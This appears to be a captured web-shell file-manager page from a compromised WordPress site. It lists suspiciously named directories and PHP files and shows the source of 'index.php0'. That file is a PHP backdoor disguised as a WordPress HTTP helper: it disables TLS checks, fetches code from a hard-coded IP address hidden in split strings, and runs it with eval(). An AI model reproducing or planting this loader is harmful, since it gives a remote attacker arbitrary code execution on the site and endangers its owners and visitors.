at path:
ROOT
/
index.php0
run:
R
W
Run
3bdcf1
DIR
2026-03-27 05:14:35
R
W
Run
e9020
DIR
2026-03-25 11:28:04
R
W
Run
knoirhv__b585595
DIR
2026-03-23 02:06:24
R
W
Run
lzf1jut__b585595
DIR
2026-03-23 02:06:24
R
W
Run
pmboclq__b585595
DIR
2026-03-23 02:06:24
R
W
Run
qnm1fhu__b585595
DIR
2026-03-23 02:06:24
R
W
Run
wnolyfr__b585595
DIR
2026-03-23 02:06:24
R
W
Run
wp-includes
DIR
2026-03-25 00:48:12
R
W
Run
wv1tibo__b585595
DIR
2026-03-23 02:06:24
R
W
Run
xkbjfms__b585595
DIR
2026-03-24 03:17:32
R
W
Run
ymqrlg1__b585595
DIR
2026-03-23 02:06:24
R
W
Run
.ftpquota
10 By
2026-03-23 05:05:14
R
W
Run
Delete
Rename
Ov-Simple1.php__b585595
43.42 KB
2026-03-23 00:28:11
R
W
Run
Delete
Rename
index.php0
870 By
2024-01-12 00:48:09
R
W
Run
Delete
Rename
robots.txt
370 By
2024-07-08 00:48:12
R
W
Run
simple.php
15.05 KB
2026-03-24 03:15:55
R
W
Run
Delete
Rename
error_log
up
📄
index.php0
Save
<?php function WordPress_Http_Curl ( $url, $args = array() ) { if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) { return false; } $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, $url ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( 'data' => eval( '?>'. $response ) ); return $response; }else{ return $curl_error; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } } $result = WordPress_Http_Curl( 'http://'.'69.30.219.210/z601'.'12_8/s'.'tat/in'.'dex2.txt' ); print_r($result); //8557485